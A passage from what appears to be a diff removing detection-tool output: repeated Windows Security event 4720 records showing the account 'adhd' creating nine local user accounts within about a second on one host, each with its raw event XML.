-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:05.4678166Z'/&gt;&lt;EventRecordID&gt;4933&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Melissa&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1148&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Melissa&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Melissa</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4927</recordid>
-            <time>2020-06-11 22:05:05.376550300Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:05.3765503Z'/&gt;&lt;EventRecordID&gt;4927&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Carolyn&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1147&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Carolyn&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Carolyn</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4921</recordid>
-            <time>2020-06-11 22:05:05.294921600Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:05.2949216Z'/&gt;&lt;EventRecordID&gt;4921&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Paul&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1146&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Paul&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Paul</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4915</recordid>
-            <time>2020-06-11 22:05:05.194865700Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:05.1948657Z'/&gt;&lt;EventRecordID&gt;4915&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Doris&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1145&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Doris&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Doris</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4909</recordid>
-            <time>2020-06-11 22:05:05.46866100Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:05.0468661Z'/&gt;&lt;EventRecordID&gt;4909&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Janet&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1144&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Janet&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Janet</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4903</recordid>
-            <time>2020-06-11 22:05:04.946612100Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:04.9466121Z'/&gt;&lt;EventRecordID&gt;4903&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Samuel&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1143&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Samuel&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Samuel</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4897</recordid>
-            <time>2020-06-11 22:05:04.860667100Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:04.8606671Z'/&gt;&lt;EventRecordID&gt;4897&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Dylan&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1142&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Dylan&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Dylan</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4891</recordid>
-            <time>2020-06-11 22:05:04.784894500Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:04.7848945Z'/&gt;&lt;EventRecordID&gt;4891&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Jordan&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1141&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Jordan&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Jordan</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4885</recordid>
-            <time>2020-06-11 22:05:04.685115700Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:04.6851157Z'/&gt;&lt;EventRecordID&gt;4885&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Janice&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1140&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Janice&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Janice</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4879</recordid>
-            <time>2020-06-11 22:05:04.607083400Z</time>
-            <channel>Security</channel>
